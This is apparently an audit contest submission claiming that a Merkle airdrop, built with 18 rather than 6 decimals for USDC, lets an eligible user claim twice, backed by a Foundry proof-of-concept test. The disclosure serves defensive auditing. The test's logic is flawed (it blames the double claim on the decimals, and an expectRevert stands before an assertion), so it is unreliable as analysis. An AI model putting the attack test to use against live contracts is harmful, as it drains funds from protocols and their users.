Submission Details
Severity:
Elligible user can claim more than the allowable limit
Summary
Vulnerability Details: The Merkle root was generated using 18 has the decimal of the token while the intended token to be airdropped which is USDC uses 6 decimal places
Impact: This allows a user who is eligible for the airdrop to claim multiple times thereby allowing the user to claim more than the protocol allowable limit
Proof of Concept: Place the following into MerkleAirdropTest.t.sol.
function testElligibleUserCanClaim_MultipleTimes() public {
//test protocol token decimal
console.log("USDC decimals --- 6");
console.log("Token decimals ---", token.decimals());
assert(token.decimals() == 18);
uint256 startingBalance = token.balanceOf(collectorOne);
vm.deal(collectorOne, airdrop.getFee() * 2);
vm.startPrank(collectorOne);
// claiming the airdrop multiple times
airdrop.claim{value: airdrop.getFee()}(
collectorOne,
amountToCollect,
proof
);
airdrop.claim{value: airdrop.getFee()}(
collectorOne,
amountToCollect,
proof
);
vm.stopPrank();
uint256 endingBalance = token.balanceOf(collectorOne);
console.log("User claims ----", endingBalance / 1e6);
console.log("Max claims ----", 25);
// user claims beyond the allowable limit
vm.expectRevert();
assertEq(endingBalance - startingBalance, amountToCollect);
}
Tools Used : Manual Review
Recommendations : The protocol should update the merkle tree generator, to ensure it uses the right number of decimal which should be 6 for USDC which the protocol intend to airdrop
Updates
Lead Judging Commences
inallhonesty
over 1 year ago
inallhonesty over 1 year ago
Submission Judgement Published Assigned finding tags:
multi-claim-airdrop
Rewards breakdown
nSLOC
62This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.